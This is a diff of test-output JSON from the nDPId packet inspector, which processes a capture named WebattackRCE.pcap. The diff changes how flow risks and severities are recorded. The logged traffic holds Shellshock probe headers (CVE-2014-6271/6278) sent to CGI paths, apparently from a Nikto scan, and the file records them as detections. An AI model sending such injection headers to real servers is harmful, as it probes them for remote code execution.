 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
+01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01159{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 